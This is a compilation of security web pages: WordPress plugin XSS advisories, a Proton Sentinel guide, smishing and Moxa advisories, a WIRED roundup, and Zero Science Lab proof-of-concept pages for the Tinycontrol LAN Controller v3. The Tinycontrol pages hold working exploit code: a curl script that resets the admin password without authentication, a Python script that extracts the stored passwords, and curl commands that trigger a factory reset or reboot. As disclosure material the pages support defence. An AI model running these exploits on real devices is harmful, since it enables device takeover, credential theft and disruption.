Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Elastic Email Sender plugin <= 1.2.6 versions.

**Solution**

 Fixed

Update the WordPress Elastic Email Sender plugin to the latest available version (at least 1.2.7).

Found this useful? Thank yuyudhn for reporting this vulnerability. Buy a coffee ☕

yuyudhn discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Elastic Email Sender Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.2.7.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-38387: WordPress Elastic Email Sender plugin <= 1.2.6 - Cross Site Scripting (XSS) - Patchstack

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Realwebcare WRC Pricing Tables plugin <= 2.3.7 versions.

**Solution**

 No fix

No patched version is available.

Found this useful? Thank Rio Darmawan for reporting this vulnerability. Buy a coffee ☕

Rio Darmawan discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress WRC Pricing Tables Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-38517: WordPress WRC Pricing Tables plugin <= 2.3.7 - Cross Site Scripting (XSS) - Patchstack

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Exifography plugin <= 1.3.1 versions.

**Solution**

 No fix

No patched version available.

Found this useful? Thank Rio Darmawan for reporting this vulnerability. Buy a coffee ☕

Rio Darmawan discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Exifography Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-38521: WordPress Exifography plugin <= 1.3.1 - Cross Site Scripting (XSS) - Patchstack

If you want the highest possible level of protection, this is it.

There's a constant battle going on between software developers trying to keep their apps and platforms secure, and hackers and malware writers eager to break through those digital defenses. In its quest to offer a more secure and private suite of web apps, security-focused service provider Proton is rolling out a new feature called Proton Sentinel.

If you're new to Proton, the Switzerland-based company offers email, VPN, cloud storage, and various other digital services, with a clear emphasis on security and privacy. It's a bit like Google without the tracking or the ads, and the newly unveiled Proton Sentinel is a “high-security program” for keeping users and their data safe.

It's worth emphasizing that Proton accounts already come with a bunch of security features and protections to keep out bad actors. There's end-to-end, zero-access encryption for user data, there's two-factor authentication to help you prove you are who you say you are when you log in, there's a custom-built spam filtering system, there are real-time notifications of logins, and more.

However, Sentinel goes further. Proton describes the additional feature as offering more protection than most people will need, aimed at “users who need the most security”: Journalists, government officials, religious leaders, and leaders of international peace organizations are mentioned as some of those who are particularly at risk from hacking attempts.

You can enable Sentinel from inside your Proton account.

Proton via David Nield

"Accounts such as these have a high risk of being attacked by criminals or state-backed hackers," writes Proton's Dingchao Lu. “We are now ready to provide the same level of advanced protection and support that we reserved for these VIPs to any Proton user that wants it through the Proton Sentinel program.”

You don't have to fall into one of those categories to use Proton Sentinel, but you do have to be a paying Proton user: a Visionary, Lifetime, Family, Unlimited, or Business plan is required, and you can see details of all the plans here.

A lot of the work that Proton Sentinel does goes on behind the scenes, and you'll find that Proton itself doesn't go into too much detail about how it functions—which is sensible if you want to minimize the chances of someone else getting around it.

The advanced security protection it offers includes strict challenges for “suspicious” login attempts, typically those from devices that you don't normally use and parts of the world that you're not normally in. You might find yourself asked to confirm more of your logins to Proton services with Sentinel enabled, but it's worth it for the extra peace of mind.

Proton says that suspicious logins are flagged by automated systems and then escalated to human security analysts, around the clock. Any support requests you file related to account security will also get escalated to trained security specialists, meaning that if there is a security problem, it's going to be dealt with more quickly.

Related to this stricter policy on logins, Proton Sentinel also gives you access to detailed security logs inside your account, listing attempts to log in using your credentials, as well as other key actions you need to be aware of (such as password changes.)

More detailed security logs are available with Proton Sentinel.

Proton via David Nield

If you're on board with Proton Sentinel and everything that it offers, log into your Proton account on the web. Click the **settings** cogwheel, then **Go to settings**, and then **Security and privacy**: At the top of the screen there should be an **Enable Proton Sentinel** toggle switch that you can turn on. That's all there is to it: You're now protected.

Farther down the same screen is the security logs panel: Turn on both **Enable authentication logs** and **Enable advanced logs** to get all of the information possible about when and where your account is being used. All successful and unsuccessful login attempts are listed here, since the very first day you opened your Proton account—and if security actions were taken on a login attempt, this will be recorded next to it.

If you see something you don't recognize, you can click the **Revoke** button next to an existing session: The device in question will be remotely logged out, and a fresh sign-in will be required to use Proton's apps on that device. It's better to err on the side of caution here, and log out from any sessions that you don't immediately recognize. If you do notice anything suspicious, you should contact Proton Support too.

Proton Sentinel is simple to set up, takes very little effort to maintain, and keeps your Proton account as well protected as possible—so it makes a lot of sense to enable the feature. Like the Enhanced Safety Mode that Google offers as part of Chrome's feature set, Sentinel goes above and beyond the norms to make sure that there's no unauthorized access to your account.

How to Use Proton Sentinel to Keep Your Accounts Safe

By Deeba Ahmed
Smishing Triad Impersonating Leading Mail/Delivery Services in New Attack
This is a post from HackRead.com Read the original post: Chinese Smishing Triad Gang Hits US Users in Extensive Cybercrime Attack

Triad cleverly impersonates postal/delivery services like Royal Mail or USPS to trap unsuspecting US citizens in its newly detected smishing campaign.

Cybersecurity rsearcgers at Resecurity have published an advisory about the newly discovered large-scale smishing campaign from the Chinese-speaking cybercrime group Smishing Triad targeting US-based users through impersonating popular mail and delivery services.

According to Resecurity, Smishing Triad originates from China and uses smishing attacks as its primary attack vector. Researchers found that Smishing Triad has affiliations with several different cybercrime groups and that the group offers cybercrime-as-a-service infrastructure with its Smishing kit subscription starting at $200/month. Subscribers receive activation codes and deployment scripts with different frameworks.

“It is complicated to disrupt cyber-criminal activity committed by actors located in foreign jurisdictions like China without proper regulatory harmonization and mutual legal assistance abroad. Resecurity is thus sharing information about the ‘Smishing Triad’ with the cybersecurity community and general public to raise awareness to help organizations better safeguard their customers,” the advisory read.

**What is a Smishing Attack?**

Smishing (aka SMS Phishing), scammers exploit SMS or text message features and services to trap unsuspecting users into revealing sensitive personal and financial details, including passwords, banking credentials, and debit/credit card numbers, and lure them into downloading malicious software.

Threat actors mimic some credible government or private entity for instance, postal services, government institutions, or banks for creating a sense of legitimacy around these messages. 

**How Does the Attack Occur?**

The group generally exploits iMessage service for sending package-tracking scams, and steals PII (personally identifiable information) and financial data (such as payment card details or banking credentials) to conduct credit card fraud and identity theft.

This time, Smishing Triad has changed its strategy slightly and exploits messages from compromised Apple iCloud accounts to trick users. Its smishing kit is also up for sale on Telegram IM groups to create an extensive and well-organized fraud-as-a-service network.

Resecurity threat intelligence team accessed and reverse-engineered one such kit and discovered an SQL injection vulnerability through which they could retrieve sensitive data of more than 108,000 victims and warned them about the likelihood of identity theft.

**Who are the Targets?**

In this campaign, Smishing Triad is targeting US citizens. The group impersonates most leading postal and delivery services to trick users, including the following:

*   USPS
*   Correos (Spain)
*   New Zealand Post
*   The Royal Mail (UK)
*   Postnord (Sweden)
*   Poczta Polska (Poland)
*   J&T Express (Indonesia)
*   New Zealand Postal Service (NZPOST)
*   Poste Italiane and the Italian Revenue Service (Agenzia delle Entrate)

The victim receives a message from any of these services requesting additional information or payment of delivery fees through a credit card. After obtaining the desired information, the attackers can commit financial fraud.

Phished text – What happens when the phishing link is clicked (Rsecurity)

In its earlier campaigns, the group targeted users from diverse regions such as the UK, Poland, Japan, Indonesia, Sweden, and Italy.

**Protection from Smishing Attacks**

Protecting yourself from smishing (SMS phishing) is important for safeguarding your personal information and financial security. Here are five points to help you stay safe from smishing:

*   **Verify the Sender**: Always verify the sender’s identity before responding to any SMS messages, especially those that ask for personal or financial information. Legitimate organizations usually include their name and contact information in their messages.
*   **Don’t Click on Links**: Avoid clicking on links or downloading attachments in text messages, especially if you didn’t expect to receive such a message. These links may lead to malicious websites or install malware on your device.
*   **Be Cautious with Personal Information**: Never share personal or financial information via text messages, such as Social Security numbers, credit card details, or login credentials. Legitimate organizations will not ask for such sensitive data through SMS.
*   **Use Trusted Sources**: If you receive an SMS claiming to be from a bank, government agency, or other official institution, don’t trust it blindly. Instead, contact the organization directly using a trusted phone number or website to verify the message’s authenticity.
*   **Install Security Software**: Use reputable antivirus and anti-malware software on your mobile device. These tools can help detect and block malicious SMS messages and links.

Additionally, keeping your phone’s operating system and apps up-to-date, using strong and unique passwords for your accounts, and enabling two-factor authentication wherever possible can further enhance your protection against smishing and other cyber threats.

Chinese Smishing Triad Gang Hits US Users in Extensive Cybercrime Attack

Tinycontrol LAN Controller version 3 suffers from an insecure access control allowing an unauthenticated attacker to change accounts passwords and bypass authentication gaining panel control access.

    #!/bin/bash: "Tinycontrol LAN Controller v3 (LK3) Remote Admin Password ChangeVendor: TinycontrolProduct web page: https://www.tinycontrol.plAffected version: <=1.58a, HW 3.8Summary: Lan Controller is a very universaldevice that allows you to connect many differentsensors and remotely view their readings andremotely control various types of outputs.It is also possible to combine both functionsinto an automatic if -> this with a calendarwhen -> then. The device provides a user interfacein the form of a web page. The website presentsreadings of various types of sensors: temperature,humidity, pressure, voltage, current. It alsoallows you to configure the device, incl. eventsetting and controlling up to 10 outputs. Thanksto the support of many protocols, it is possibleto operate from smartphones, collect and observthe results on the server, as well as cooperationwith other I/O systems based on TCP/IP and Modbus.Desc: The application suffers from an insecure accesscontrol allowing an unauthenticated attacker tochange accounts passwords and bypass authenticationgaining panel control access.Tested on: lwIPVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5787Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5787.php18.08.2023"set -euo pipefailIFS=$'\n\t'if [ $# -ne 2 ]; then    echo -ne '\nUsage: $0 [ipaddr] [desired admin pwd]\n\n'    exitfiIP=$1PW=$2EN=$(echo -n $PW | base64)curl -s http://$IP/stm.cgi?auth=00YWRtaW4=*$EN*dXNlcg==*dXNlcg==# ?auth=00 (disable authentication, disable upgrade), https://docs.tinycontrol.pl/en/lk3/api/access/echo -ne '\nAdmin password changed to: '$PW

Tinycontrol LAN Controller 3 Remote Admin Password Change

Tinycontrol LAN Controller version 3 suffers from an issue where an unauthenticated attacker can retrieve the controller's configuration backup file and extract sensitive information that can allow him/her/them to bypass security controls and penetrate the system in its entirety.

    #!/usr/bin/env python### Tinycontrol LAN Controller v3 (LK3) Remote Credentials Extraction PoC### Vendor: Tinycontrol# Product web page: https://www.tinycontrol.pl# Affected version: <=1.58a, HW 3.8## Summary: Lan Controller is a very universal# device that allows you to connect many different# sensors and remotely view their readings and# remotely control various types of outputs.# It is also possible to combine both functions# into an automatic if -> this with a calendar# when -> then. The device provides a user interface# in the form of a web page. The website presents# readings of various types of sensors: temperature,# humidity, pressure, voltage, current. It also# allows you to configure the device, incl. event# setting and controlling up to 10 outputs. Thanks# to the support of many protocols, it is possible# to operate from smartphones, collect and observ# the results on the server, as well as cooperation# with other I/O systems based on TCP/IP and Modbus.## Desc: An unauthenticated attacker can retrieve the# controller's configuration backup file and extract# sensitive information that can allow him/her/them# to bypass security controls and penetrate the system# in its entirety.## Tested on: lwIP### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic#                             @zeroscience### Advisory ID: ZSL-2023-5786# Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5786.php### 18.08.2023##import subprocessimport requestsimport base64import sysbinb = "lk3_settings.bin"outf = "lk3_settings.enc"bpatt = "0upassword"epatt = "pool.ntp.org"startf = Falseendf = Falseextral = []print("""    O`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'O    |                                          |    |     Tinycontrol LK3 1.58 Settings DL     |    |              ZSL-2023-5786               |    |         2023 (c) Zero Science Lab        |    |                                          |    |`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'|    |                                          |""")if len(sys.argv) != 2:    print("[?] Vaka: python {} ipaddr:port".format(sys.argv[0]))    exit(-0)else:    rhost=sys.argv[1]    if not "http" in rhost:        rhost="http://{}".format(rhost)try:    resp = requests.get(rhost + "/" + binb)    if resp.status_code == 200:        with open(outf, 'wb') as f:            f.write(resp.content)        print(f"[*] Got data as {outf}")    else:        print(f"[!] Backup failed. Status code: {resp.status_code}")except Exception as e:    print("[!] Error:", str(e))    exit(-1)binf = outfsout = subprocess.check_output(["strings", binf], universal_newlines = True)linea = sout.split("\n")for thricer in linea:    if bpatt in thricer:        startf = True    elif epatt in thricer:        endf = True    elif startf and not endf:        extral.append(thricer)if len(extral) >= 4:    userl = extral[1].strip()    adminl = extral[3].strip()    try:        decuser = base64.b64decode(userl).decode("utf-8")        decadmin = base64.b64decode(adminl).decode("utf-8")        print("[+] User password:", decuser)        print("[+] Admin password:", decadmin)    except Exception as e:        print("[!] Error decoding:", str(e))else:    print("[!] Regex failed.")    exit(-2)

Tinycontrol LAN Controller 3 Remote Credential Extraction

Tinycontrol LAN Controller version 3 suffers from an unauthenticated remote denial of service vulnerability. An attacker can issue direct requests to the stm.cgi page to reboot and also reset factory settings on the device.

    Tinycontrol LAN Controller v3 (LK3) Remote Denial Of Service ExploitVendor: TinycontrolProduct web page: https://www.tinycontrol.plAffected version: <=1.58a, HW 3.8Summary: Lan Controller is a very universaldevice that allows you to connect many differentsensors and remotely view their readings andremotely control various types of outputs.It is also possible to combine both functionsinto an automatic if -> this with a calendarwhen -> then. The device provides a user interfacein the form of a web page. The website presentsreadings of various types of sensors: temperature,humidity, pressure, voltage, current. It alsoallows you to configure the device, incl. eventsetting and controlling up to 10 outputs. Thanksto the support of many protocols, it is possibleto operate from smartphones, collect and observthe results on the server, as well as cooperationwith other I/O systems based on TCP/IP and Modbus.Desc: The controller suffers from an unauthenticatedremote denial of service vulnerability. An attackercan issue direct requests to the stm.cgi page toreboot and also reset factory settings on the device.Tested on: lwIPVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5785Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5785.php18.08.2023--$ curl http://192.168.1.1:8082/stm.cgi?eeprom_reset=1 # restore default settings$ curl http://192.168.1.1:8082/stm.cgi?lk3restart=1   # reboot controller

Tinycontrol LAN Controller 3 Denial Of Service

A vulnerability that poses a potential risk of polluting the MXsecurity sqlite database and the nsm-web UI has been identified in MXsecurity versions prior to v1.0.1. This vulnerability might allow an unauthenticated remote attacker to register or add devices via the nsm-web application.



As of June 15, 2022, this site no longer supports Internet Explorer. Please use another browser for the best experience on our site.

**Please sign in**

**SUMMARY**

**MXsecurity Series Multiple Vulnerabilities**

*   Security Advisory ID: MPSA-230403
*   Version: V1.1
*   Release Date: Sep 01, 2023
*   Reference:
    *   CVE-2023-39979 (cve.org)
    *   CVE-2023-39980 (cve.org)
    *   CVE-2023-39981 (cve.org)
    *   CVE-2023-39982 (cve.org)
    *   CVE-2023-39983 (cve.org)

These vulnerabilities are caused by the improper design or implementation of authentication mechanisms and input validation. Exploiting these vulnerabilities could enable an attacker to bypass authentication, which could lead to the unauthorized disclosure or tampering of authenticated information, unauthorized access to sensitive data, and remote access without proper authorization.

  
The identified vulnerability types and potential impacts are shown below:

Item

Vulnerability Type

Impact

1

Small Space of Random Values (CWE-334)

CVE-2023-39979

An attacker can bypass authentication to gain unauthorized access.

2

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') (CWE-89)

CVE-2023-39980

An attacker can change the SQL command to gain unauthorized access to disclose information.

3

Improper Authentication (CWE-287)

CVE-2023-39981

An attacker can gain unauthorized access to disclose device information.

4

Use of Hard-coded Credentials (CWE-798)

CVE-2023-39982

An attacker can facilitate man-in-the-middle attacks and enable the decryption of SSH traffic.

5

Improperly Controlled Modification of Dynamically-Determined Object Attributes (CWE-915)

CVE-2023-39983

An attacker can register/add a device via the nsm-web application.

**Vulnerability Scoring Details**

ID

CVSS V3.1

VECTOR

REMOTE EXPLOIT WITHOUT AUTH?

CVE-2023-39979

9.8

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Yes

CVE-2023-39980

7.1

AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

No

CVE-2023-39981

7.5

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Yes

CVE-2023-39982

7.5

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Yes

CVE-2023-39983

5.3

AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Yes

**AFFECTED PRODUCTS AND SOLUTIONS**

**Affected Products:**

The affected products and firmware versions are shown below.

Product Series

Affected Versions

MXsecurity Series

Software version v1.0.1 and prior versions

**Solutions:**

Moxa has developed appropriate solutions to address the vulnerabilities. The solutions for affected products are shown below.

Product Series

Solutions

MXsecurity Series

Please upgrade to firmware v1.1.0 or later.

****Mitigation****

*   Minimize network exposure to ensure the device is not accessible from the Internet.
*   When remote access is required, use secure methods, such as Virtual Private Networks (VPNs).
*   The starting point of all the above vulnerabilities is from the web service, so it is suggested to disable web service temporarily if you completed configuration to prevent further damages from these vulnerabilities until installed patch or updated firmware. 

**Products Confirmed Not Vulnerable:**

Only products listed in the Affected Products section of this advisory are known to be affected by these vulnerabilities. 

**Acknowledgment:**

We would like to express our appreciation to Noam Moshe of Claroty Research - Team82 for reporting the vulnerabilities (CVE-2023-39979, CVE-2023-39980, and CVE-2023-39981), Darren Martyn for advising on a vulnerability (CVE-2023-39982), and James Sebree from the Tenable Bug Bounty Program for his contribution in reporting a vulnerability (CVE-2023-39983) and working with us to help enhance the security of our products and provide a better service to our customers.

**Revision History:**

VERSION

DESCRIPTION

RELEASE DATE

1.0

First Release

Sept. 1, 2023

1.1

Update credit to Claroty

Sept. 1, 2023

**Relevant Products**

MXsecurity Series ·

*     Print this page
    
*   You can manage and share your saved list in My Moxa
    

**Let’s get that fixed**

If you are concerned about a potential cybersecurity vulnerability, please contact us and one of technical support staff will get in touch with you.

Report a Vulnerability

You have some items waiting in your bag; click here to finish your quote!

You are currently on the Global / English site.  
Would you like to go to the site for your region?

Feedback

CVE-2023-39983: MXsecurity Series Multiple Vulnerabilities

Plus: A major FBI botnet takedown, new Sandworm malware, a cyberattack on two major scientific telescopes—and more.

A monthslong WIRED investigation published this week revealed the inner workings of the Trickbot ransomware gang, which has targeted hospitals, businesses, and government agencies around the world. 

The investigation stemmed from a mysterious leak publish on X (formerly Twitter) last year by an anonymous account called Trickleaks. The document trove contained dossiers on 35 alleged Trickbot members, including names, dates of birth, and much more. It also listed thousands of IP addresses, cryptocurrency wallets, email addresses, and Trickbot chat logs. Armed with this information, we enlisted the help of multiple cybersecurity and Russian cybercrime experts to paint a vivid picture of Trickbot’s organizational structure and corroborate the real-world identity of one of its key members. 

Last weekend, someone (more on that later) successfully disrupted more than 20 trains in Poland. The incidents were originally described as a “cyberattack,” but it was actually something much simpler: a radio hack. Using equipment that can cost as little as $30, the attack exploited the trains’ unencrypted radio system to cause them to perform an emergency stop. 

Over on the dark web, cybercriminals are making money in an unexpected way: writing contests. With total prizes reaching as high as $80,000, the competitions enlist hacking forum members to craft the best essays, many of which explain how to carry out cyberattacks and scams. 

Last December, Apple officially killed its controversial photo-scanning tool for detecting child sexual abuse material (CSAM) on iCloud, a tool the company launched in August 2021 before un-launching it a month later after backlash from cybersecurity experts, civil liberties advocates, and others who argued that the tool would violate users’ security and privacy. But the issue is far from resolved. This week, a new child safety group called Heat Initiative demanded that Apple reinstate the tool. Apple responded with a letter, which it shared with WIRED, detailing for the first time its full reasoning behind terminating the tool. Heat Initiative’s push comes amid international pressure to weaken encryption for law enforcement purposes.

Elsewhere, we detailed the big security patches you need to install to keep your devices safe (looking at you, Google Chrome and Android users). And we dove into the supremely nerdy world of a code-cracking competition that had contestants racing to decode a German U-boat cipher from World War II. One team had a secret weapon.

But that’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

When more than 20 trains in Poland were bought to a halt last weekend in what was described as a “cyberattack,” all eyes turned to Russia. After all, Poland’s rails serve as a key piece of infrastructure for supporting Ukraine’s war effort. But as we reported a day later, the disruption had been caused not through any sophisticated cyber intrusion but through a simple radio hack that sent a “radio stop” command to the Polish trains over an unencrypted and unauthenticated system. “The frequencies are known. The tones are known. The equipment is cheap,” Polish-speaking cybersecurity researcher Lukasz Olejnik told WIRED. “Everybody could do this. Even teenagers trolling.”

Well, not teenagers exactly, but twentysomethings. This week, Polish police arrested a 24-year-old man and a 29-year-old man, both Polish citizens, who allegedly carried out the radio train hack. One of the two men, based in the city of Bialystok near the border with Belarus, was a police officer. Amateur radio equipment was found in one of their apartments, according to Poland’s RMF Radio, where the younger man was found (reportedly in a drunken state).

Tag

#web